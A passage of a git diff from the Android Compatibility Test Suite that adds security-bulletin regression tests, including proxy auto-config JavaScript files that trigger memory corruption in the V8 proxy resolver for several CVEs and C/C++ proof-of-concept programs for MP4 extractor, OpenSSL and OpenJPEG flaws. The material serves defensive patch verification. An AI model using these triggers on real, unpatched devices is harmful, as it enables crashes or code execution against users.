diff options
268 files changed, 9198 insertions, 708 deletions
diff --git a/apps/hotspot/AndroidManifest.xml b/apps/hotspot/AndroidManifest.xml index 277be5fa117..fd8b04593b3 100644 --- a/apps/hotspot/AndroidManifest.xml +++ b/apps/hotspot/AndroidManifest.xml @@ -5,6 +5,7 @@ <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" /> <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /> + <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /> <application> <activity android:name=".MainActivity"> <intent-filter> diff --git a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java index 2e0ed876e7d..eb815637182 100644 --- a/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java +++ b/apps/hotspot/src/com/android/cts/hotspot/MainActivity.java @@ -16,5 +16,11 @@ public class MainActivity extends Activity { ActivityCompat.requestPermissions( this, new String[] {Manifest.permission.ACCESS_COARSE_LOCATION}, 2); } + + if (ActivityCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) + != PackageManager.PERMISSION_GRANTED) { + ActivityCompat.requestPermissions( + this, new String[] {Manifest.permission.ACCESS_FINE_LOCATION}, 2); + } } } diff --git a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java index 9bcf2a11816..fb6477d9ebc 100644 --- a/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java +++ b/hostsidetests/bootstats/src/android/bootstats/cts/BootStatsHostTest.java @@ -38,7 +38,7 @@ import java.util.LinkedList; @RunWith(DeviceJUnit4ClassRunner.class) public class BootStatsHostTest implements IDeviceTest { - private static final long MAX_WAIT_TIME_MS = 30000; + private static final long MAX_WAIT_TIME_MS = 100000; private static final long WAIT_SLEEP_MS = 100; private static int[] ATOMS_EXPECTED = { diff --git a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java index 1da1202b5de..eef1577579a 100644 --- a/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java +++ b/hostsidetests/devicepolicy/app/IntentSender/src/com/android/cts/intent/sender/AppLinkTest.java @@ -93,6 +93,7 @@ public class AppLinkTest extends InstrumentationTestCase { private Intent getHttpIntent() { Intent i = new Intent(Intent.ACTION_VIEW); i.addCategory(Intent.CATEGORY_BROWSABLE); + i.addCategory(Intent.CATEGORY_DEFAULT); i.setData(Uri.parse("http://com.android.cts.intent.receiver")); return i; } diff --git a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java index de90629d340..b63e4ca75c9 100644 --- a/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java +++ b/hostsidetests/security/src/android/security/cts/SELinuxHostTest.java @@ -222,6 +222,8 @@ public class SELinuxHostTest extends DeviceTestCase implements IBuildReceiver, I File systemSepolicyCilFile = File.createTempFile("plat_sepolicy", ".cil"); systemSepolicyCilFile.deleteOnExit(); + File fileContextsFile = File.createTempFile("file_contexts", ".txt"); + fileContextsFile.deleteOnExit(); assertTrue(device.pullFile("/system/etc/selinux/plat_sepolicy.cil", systemSepolicyCilFile)); @@ -229,6 +231,7 @@ public class SELinuxHostTest extends DeviceTestCase implements IBuildReceiver, I secilc.getAbsolutePath(), "-m", "-M", "true", "-c", "30", "-o", builtPolicyFile.getAbsolutePath(), + "-f", fileContextsFile.getAbsolutePath(), systemSepolicyCilFile.getAbsolutePath()); pb.redirectOutput(ProcessBuilder.Redirect.PIPE); pb.redirectErrorStream(true); diff --git a/hostsidetests/securitybulletin/Android.bp b/hostsidetests/securitybulletin/Android.bp index f17395ee944..49c5dfddd11 100644 --- a/hostsidetests/securitybulletin/Android.bp +++ b/hostsidetests/securitybulletin/Android.bp @@ -37,11 +37,12 @@ cc_defaults { compile_multilib: "both", multilib: { lib32: { - suffix: "32", + suffix: "_sts32", }, lib64: { - suffix: "64", + suffix: "_sts64", }, + // build/soong/common/arch.go default returns nil; no default possible }, arch: { arm: { diff --git a/hostsidetests/securitybulletin/AndroidTest.xml b/hostsidetests/securitybulletin/AndroidTest.xml index a6b5c79b0fc..bd55c9b0097 100644 --- a/hostsidetests/securitybulletin/AndroidTest.xml +++ b/hostsidetests/securitybulletin/AndroidTest.xml @@ -27,7 +27,6 @@ <target_preparer class="com.android.tradefed.targetprep.suite.SuiteApkInstaller"> <option name="cleanup-apks" value="true" /> - <option name="test-file-name" value="OomCatcher.apk" /> <option name="test-file-name" value="MainlineModuleDetector.apk" /> <option name="test-file-name" value="hotspot.apk" /> </target_preparer> diff --git a/hostsidetests/securitybulletin/res/cve_2015_6616.mp4 b/hostsidetests/securitybulletin/res/cve_2015_6616.mp4 Binary files differnew file mode 100644 index 00000000000..716c942d369 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2015_6616.mp4 diff --git a/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 Binary files differnew file mode 100644 index 00000000000..2e30e91d1cd --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2017_0726.mp4 diff --git a/hostsidetests/securitybulletin/res/cve_2019_2046.pac b/hostsidetests/securitybulletin/res/cve_2019_2046.pac new file mode 100644 index 00000000000..82ef4317961 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2019_2046.pac @@ -0,0 +1,27 @@ +function FindProxyForURL(url, host){ + const f = eval(`(function f(i) { + if (i == 0) { + class Derived extends Object { + constructor() { + super(); + ${"this.a=1;".repeat(0x3fffe-8)} + } + } + + return Derived; + } + + class DerivedN extends f(i-1) { + constructor() { + super(); + ${"this.a=1;".repeat(0x40000-8)} + } + } + + return DerivedN; + })`); + + let a = new (f(0x7ff))(); + a; + return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2020_0224.pac b/hostsidetests/securitybulletin/res/cve_2020_0224.pac new file mode 100644 index 00000000000..6b8f6895d24 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0224.pac @@ -0,0 +1,74 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function gc() { + for (let i = 0; i < 0x10; i++) + new ArrayBuffer(0x800000); +} +function to_dict(obj) { +obj.__defineGetter__('x',()=>2); +obj.__defineGetter__('x',()=>2); +} +function fk() { +rgx = null; +dbl_arr = [1.1, 2.2, 3.3, 4.4]; +o = {}; +o.__defineGetter__("length", ()=> { + rgx = new RegExp(/AAAAAAAA/y); + return 2; + }); +o[0] = "aaaa"; +o.__defineGetter__(1, ()=> { + for (let i=0;i<8;i++) dbl_arr.push(5.5); + + let cnt = 0; + rgx[Symbol.replace]("AAAAAAAA", { + toString: ()=> { + cnt++; + if (cnt == 2) { + rgx.lastIndex = {valueOf: ()=> { + to_dict(rgx); + gc(); + return 0; + }}; + + } + + return 'BBBB$'; + } + }); + return "bbbb"; + }); +p = new Proxy( {}, { + ownKeys: function(target) { + return o; + }, + getOwnPropertyDescriptor(target, prop) { + return {configurable: true, enumerable: true, value: 5}; + } + }); + +Object.keys(p); +alert (dbl_arr[0]); +if (dbl_arr[0] == 1.1) { + fail("failed to corrupt dbl_arr"); +} +} + +function FindProxyForURL(url, host) { +fk(); +return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2020_0240.pac b/hostsidetests/securitybulletin/res/cve_2020_0240.pac new file mode 100644 index 00000000000..677120e4f23 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0240.pac @@ -0,0 +1,27 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host){ +array = []; +array.length = 0xffffffff; + +b = array.fill(1.1, 0, {valueOf() { + array.length = 32; + array.fill(1.1); + return 0x80000000; +}}); +return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.info b/hostsidetests/securitybulletin/res/cve_2020_0381.info Binary files differnew file mode 100644 index 00000000000..510c136cc08 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0381.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0381.xmf b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf Binary files differnew file mode 100644 index 00000000000..cbe4bbc75ed --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0381.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.info b/hostsidetests/securitybulletin/res/cve_2020_0383.info Binary files differnew file mode 100644 index 00000000000..175c47c9f57 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0383.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0383.xmf b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf Binary files differnew file mode 100644 index 00000000000..921efe1eb38 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0383.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.info b/hostsidetests/securitybulletin/res/cve_2020_0384.info Binary files differnew file mode 100644 index 00000000000..e74b507b210 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0384.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0384.xmf b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf Binary files differnew file mode 100644 index 00000000000..5056ce39a6b --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0384.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.info b/hostsidetests/securitybulletin/res/cve_2020_0385.info Binary files differnew file mode 100644 index 00000000000..f0d0459372e --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0385.info diff --git a/hostsidetests/securitybulletin/res/cve_2020_0385.xmf b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf Binary files differnew file mode 100644 index 00000000000..6437f9e7bb2 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2020_0385.xmf diff --git a/hostsidetests/securitybulletin/res/cve_2021_0393.pac b/hostsidetests/securitybulletin/res/cve_2021_0393.pac new file mode 100644 index 00000000000..42038b61549 --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0393.pac @@ -0,0 +1,22 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host) { + let s = String.fromCharCode(0x4141).repeat(0x10000001) + "A"; + s = "'" + s + "'"; + eval(s); + return "DIRECT"; +} diff --git a/hostsidetests/securitybulletin/res/cve_2021_0396.pac b/hostsidetests/securitybulletin/res/cve_2021_0396.pac new file mode 100644 index 00000000000..5677445a03b --- /dev/null +++ b/hostsidetests/securitybulletin/res/cve_2021_0396.pac @@ -0,0 +1,23 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +function FindProxyForURL(url, host){ + var evil_call = eval("(function(" + Array(65535).fill("x").join(",") + "){})"); + f(evil_call()); + return "DIRECT"; +} + +function f(){} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp index 6f087cc64a7..10bbf66d052 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-3873/Android.bp @@ -26,9 +26,6 @@ cc_test { "frameworks/av/media/libmedia/include", ], multilib: { - lib32: { - suffix: "32", - }, lib64: { shared_libs: [ "libstagefright", @@ -37,7 +34,6 @@ cc_test { "libstagefright_foundation", "libdatasource", ], - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp new file mode 100644 index 00000000000..33d0680fe00 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/Android.bp @@ -0,0 +1,39 @@ +/* + * Copyright (C) 2020 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ + +cc_test { + name: "CVE-2015-6616", + + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + + srcs: [ + "poc.cpp", + ], + + include_dirs: [ + "frameworks/av/media/libdatasource/include", + "frameworks/av/media/libstagefright/include", + "cts/hostsidetests/securitybulletin/securityPatch/includes", + ], + + shared_libs: [ + "libstagefright", + "libutils", + "libmedia", + "libdatasource", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp new file mode 100644 index 00000000000..8d175cc311d --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2015-6616/poc.cpp @@ -0,0 +1,105 @@ +/** + * Copyright (C) 2019 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#include <dlfcn.h> +#include <sys/types.h> +#include <media/DataSource.h> +#include <datasource/FileSource.h> +#include <media/stagefright/MediaExtractor.h> +#include <android/IMediaExtractor.h> +#include <media/stagefright/DataSourceBase.h> +#include <media/stagefright/MetaData.h> +#include "../includes/common.h" +#define LIBNAME "/system/lib64/extractors/libmp4extractor.so" +#define LIBNAME_APEX "/apex/com.android.media/lib64/extractors/libmp4extractor.so" + +void * operator new(size_t size) { + if (size > 64 * 1024 * 1024) { + exit (EXIT_VULNERABLE); + } + return malloc(size); +} + +using namespace android; + +int main(int argc, char **argv) { + (void) argc; + (void) argv; +#if _64_BIT + GetExtractorDef getDef = nullptr; + if (argc < 2) { + return EXIT_FAILURE; + } + + void *libHandle = dlopen(LIBNAME, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + libHandle = dlopen(LIBNAME_APEX, RTLD_NOW | RTLD_LOCAL); + if (!libHandle) { + return EXIT_FAILURE; + } + } + + getDef = (GetExtractorDef)dlsym(libHandle, "GETEXTRACTORDEF"); + if (!getDef) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + sp < DataSource > dataSource = new FileSource(argv[1]); + if (dataSource == nullptr) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + void *meta = nullptr; + void* creator = nullptr; + FreeMetaFunc freeMeta = nullptr; + float confidence; + if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V1) { + creator = (void*) getDef().u.v2.sniff(dataSource->wrap(), &confidence, + &meta, &freeMeta); + } else if (getDef().def_version == EXTRACTORDEF_VERSION_NDK_V2) { + creator = (void*) getDef().u.v3.sniff(dataSource->wrap(), &confidence, + &meta, &freeMeta); + } + if (!creator) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + CMediaExtractor *ret = ((CreatorFunc) creator)(dataSource->wrap(), meta); + if (ret == nullptr) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + if (meta != nullptr && freeMeta != nullptr) { + freeMeta(meta); + } + + MediaExtractorCUnwrapper *mediaExtractorCUnwrapper = + new MediaExtractorCUnwrapper(ret); + MediaTrack* source = mediaExtractorCUnwrapper->getTrack(0); + if (source == nullptr) { + dlclose(libHandle); + return EXIT_FAILURE; + } + + source->start(); + + dlclose(libHandle); +#endif /* _64_BIT */ + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp new file mode 100644 index 00000000000..9a853179387 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/Android.bp @@ -0,0 +1,27 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2016-2182", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.cpp", + ], + shared_libs: [ + "libcrypto", + "libssl", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp new file mode 100644 index 00000000000..78e1e732fea --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2182/poc.cpp @@ -0,0 +1,138 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +#include <dlfcn.h> +#include <string.h> +#include <openssl/ssl.h> +#include <openssl/crypto.h> +#include <openssl/bn.h> +#include <memory> +#include "../includes/common.h" + +/** NOTE: These values are for the BIGNUM declared in kBN2DecTests and */ +/** must be updated if kBN2DecTests is changed. */ +#if _32_BIT +#define ALLOCATION_SIZE 52 +static const int sMallocSkipCount[] = {1,0}; +#else +#define ALLOCATION_SIZE 56 +static const int sMallocSkipCount[] = {0,0}; +#endif + +static const char *kTest = + "123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890"; + +static int sCount = 0; +static bool sOverloadMalloc = false; +int loopIndex = 0; + +template<typename T> +struct OpenSSLFree { + void operator()(T *buf) { + OPENSSL_free(buf); + } +}; + +using ScopedOpenSSLString = std::unique_ptr<char, OpenSSLFree<char>>; + +namespace crypto { +template<typename T, void (*func)(T*)> +struct OpenSSLDeleter { + void operator()(T *obj) { + func(obj); + } +}; + +template<typename Type, void (*Destroyer)(Type*)> +struct OpenSSLDestroyer { + void operator()(Type* ptr) const { + Destroyer(ptr); + } +}; + +template<typename T, void (*func)(T*)> +using ScopedOpenSSLType = std::unique_ptr<T, OpenSSLDeleter<T, func>>; + +template<typename PointerType, void (*Destroyer)(PointerType*)> +using ScopedOpenSSL = +std::unique_ptr<PointerType, OpenSSLDestroyer<PointerType, Destroyer>>; + +struct OpenSSLFree { + void operator()(uint8_t* ptr) const { + OPENSSL_free(ptr); + } +}; + +using ScopedBIGNUM = ScopedOpenSSL<BIGNUM, BN_free>; +using ScopedBN_CTX = ScopedOpenSSLType<BN_CTX, BN_CTX_free>; +} // namespace crypto + +static int DecimalToBIGNUM(crypto::ScopedBIGNUM *out, const char *in) { + BIGNUM *raw = nullptr; + int ret = BN_dec2bn(&raw, in); + out->reset(raw); + return ret; +} + +void* (*realMalloc)(size_t) = nullptr; + +void mtraceInit(void) { + realMalloc = (void *(*)(size_t))dlsym(RTLD_NEXT, "malloc"); + return; +} + +void *malloc(size_t size) { + if (realMalloc == nullptr) { + mtraceInit(); + } + if (!sOverloadMalloc) { + return realMalloc(size); + } + if (size == ALLOCATION_SIZE) { + if (sCount >= sMallocSkipCount[loopIndex]) { + return nullptr; + } + ++sCount; + } + return realMalloc(size); +} + +using namespace crypto; + +int main() { + CRYPTO_library_init(); + ScopedBN_CTX ctx(BN_CTX_new()); + if (!ctx) { + return EXIT_FAILURE; + } + for(loopIndex = 0; loopIndex < 2; ++loopIndex) { + ScopedBIGNUM bn; + int ret = DecimalToBIGNUM(&bn, kTest); + if (!ret) { + return EXIT_FAILURE; + } + sOverloadMalloc = true; + ScopedOpenSSLString dec(BN_bn2dec(bn.get())); + sOverloadMalloc = false; + if (!dec) { + return EXIT_FAILURE; + } + if (strcmp(dec.get(), kTest)) { + return EXIT_FAILURE; + } + } + return EXIT_SUCCESS; +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp index c2b7636bb79..630cb39bc3e 100644 --- a/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-2485/Android.bp @@ -39,10 +39,6 @@ cc_test { "android.hidl.allocator@1.0", "android.hardware.media.omx@1.0", ], - suffix: "32", - }, - lib64: { - suffix: "64", }, }, } diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp new file mode 100644 index 00000000000..bbe6c7bab0c --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/Android.bp @@ -0,0 +1,33 @@ +/* + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at: + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + * + */ +cc_test { + name: "CVE-2016-8332", + defaults: ["cts_hostsidetests_securitybulletin_defaults"], + srcs: [ + "poc.c", + ":cts_hostsidetests_securitybulletin_memutils", + ], + cflags: [ + "-DCHECK_OVERFLOW", + ], + shared_libs: [ + "libpdfium", + ], + include_dirs: [ + "external/pdfium/third_party/libopenjpeg20", + ], +} diff --git a/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c new file mode 100644 index 00000000000..86cbaec9050 --- /dev/null +++ b/hostsidetests/securitybulletin/securityPatch/CVE-2016-8332/poc.c @@ -0,0 +1,141 @@ +/** + * Copyright (C) 2021 The Android Open Source Project + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +#define _GNU_SOURCE +#include <sys/types.h> +#include <sys/wait.h> +#include <string.h> +#include <stdlib.h> +#include "openjpeg.h" +#include "opj_includes.h" + +#define REPEATVALUES 100000 + +unsigned char gStartValues[] = { 0xFF, 0x4F, 0xFF, 0x51, 0x00, 0x2F, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, 0x00, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x2E, + 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x07, 0x01, + 0x01, 0x07, 0x01, 0x01, 0x07, 0x01, 0x01, 0xFF, 0x64, 0x00, 0x23, 0x00, + 0x01, 0x43, 0x72, 0x65, 0x61, 0x74, 0x6F, 0x72, 0x3A, 0x20, 0x4A, 0x61, + 0x73, 0x50, 0x65, 0x72, 0x20, 0x56, 0x65, 0x72, 0x73, 0x69, 0x6F, 0x6E, + 0x20, 0x31, 0x2E, 0x37, 0x30, 0x30, 0x2E, 0x31, 0xFF, 0x52, 0x00, 0x0C, + 0x00, 0x00, 0x00, 0x01, 0x01, 0x05, 0x04, 0x04, 0x00, 0x01, 0xFF, 0x5C, + 0x00, 0x13, 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, + 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x01, + 0x40, 0x40, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, + 0x48, 0x50, 0x48, 0x48, 0x50, 0xFF, 0x5D, 0x00, 0x14, 0x02, 0x40, 0x40, + 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, 0x48, 0x48, 0x50, + 0x48, 0x48, 0x50 }; +unsigned int gNumStartValues = sizeof(gStartValues) / sizeof(gStartValues[0]); + +unsigned char gRepeatValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x00, + 0x00, 0x00, 0x00, 0x00 }; +unsigned int gNumRepeatValues = sizeof(gRepeatValues) + / sizeof(gRepeatValues[0]); + +unsigned char gLastValues[] = { 0xFF, 0x75, 0x00, 0x09, 0x00, 0x00, 0x01, 0x00, + 0x00, 0x00, 0x00 }; +unsigned int gNumLastValues = sizeof(gLastValues) / sizeof(gLastValues[0]); + +typedef struct { + char* blob; + ssize_t blobSize; + ssize_t readPos; +} applicationContext; + +opj_stream_t* allocate_stream(void) { + opj_stream_private_t * stream = NULL; + + stream = (opj_stream_private_t*) opj_calloc(1, sizeof(opj_stream_private_t)); + if (!stream) { + return NULL; + } + + stream->m_buffer_size = OPJ_J2K_STREAM_CHUNK_SIZE; + stream->m_stored_data = (OPJ_BYTE *) opj_malloc(OPJ_J2K_STREAM_CHUNK_SIZE); + if (!stream->m_stored_data) { + opj_free(stream); + return NULL; + } + + stream->m_current_data = stream->m_stored_data; + stream->m_status |= OPJ_STREAM_STATUS_INPUT; + stream->m_opj_skip = opj_stream_read_skip; + stream->m_opj_seek = opj_stream_read_seek; + stream->m_read_fn = opj_stream_default_read; + stream->m_write_fn = opj_stream_default_write; + stream->m_skip_fn = opj_stream_default_skip; + stream->m_seek_fn = opj_stream_default_seek; + + return (opj_stream_t *) stream; +} + +static OPJ_SIZE_T ReadHandler(void *buffer, OPJ_SIZE_T length, void *context) { + applicationContext* appContext = (applicationContext*) context; + ssize_t count = 0; + ssize_t rem = 0; + if (!appContext) { + return ((OPJ_SIZE_T) - 1); + } + rem = appContext->blobSize - appContext->readPos; + if ((ssize_t) length <= rem) { + count = length; + } else { + count = rem; + } + memcpy(buffer, &appContext->blob[appContext->readPos], count); + appContext->readPos += count; + return ((OPJ_SIZE_T) length); +} + +int main(void) { + ssize_t offset = 0; + unsigned int count = 0; + applicationContext sContext; + opj_j2k_t* codec = NULL; + opj_stream_t* stream = NULL; + opj_image_t* image = NULL; + opj_stream_private_t* private = NULL; + opj_event_mgr_t eventMgr; + stream = allocate_stream(); + private = (opj_stream_private_t*)stream; + + sContext.blobSize = gNumStartValues + REPEATVALUES * gNumRepeatValues + + gNumLastValues; + sContext.blob = (char*) opj_malloc(sContext.blobSize); + if (!sContext.blob) { + return EXIT_FAILURE; + } + memset(sContext.blob, 0, sContext.blobSize); + + memcpy(&sContext.blob[offset], gStartValues, gNumStartValues); + offset += gNumStartValues; + for (count = 0; count < REPEATVALUES; ++count) { + memcpy(&sContext.blob[offset], gRepeatValues, gNumRepeatValues); + offset += gNumRepeatValues; + } + memcpy(&sContext.blob[offset], gLastValues, gNumLastValues); + offset += gNumLastValues; + sContext.readPos = 0; + private->m_read_fn = ReadHandler; + private->m_user_data = (void*)&sContext; + private->m_user_data_length = sContext.blobSize; + private->m_free_user_data_fn = NULL; + codec = opj_j2k_create_decompress(); + opj_set_default_event_handler(&eventMgr); + opj_j2k_read_header(private,codec,&image,&eventMgr); + opj_free(sContext.blob); + return EXIT_SUCCESS; +} diff --git 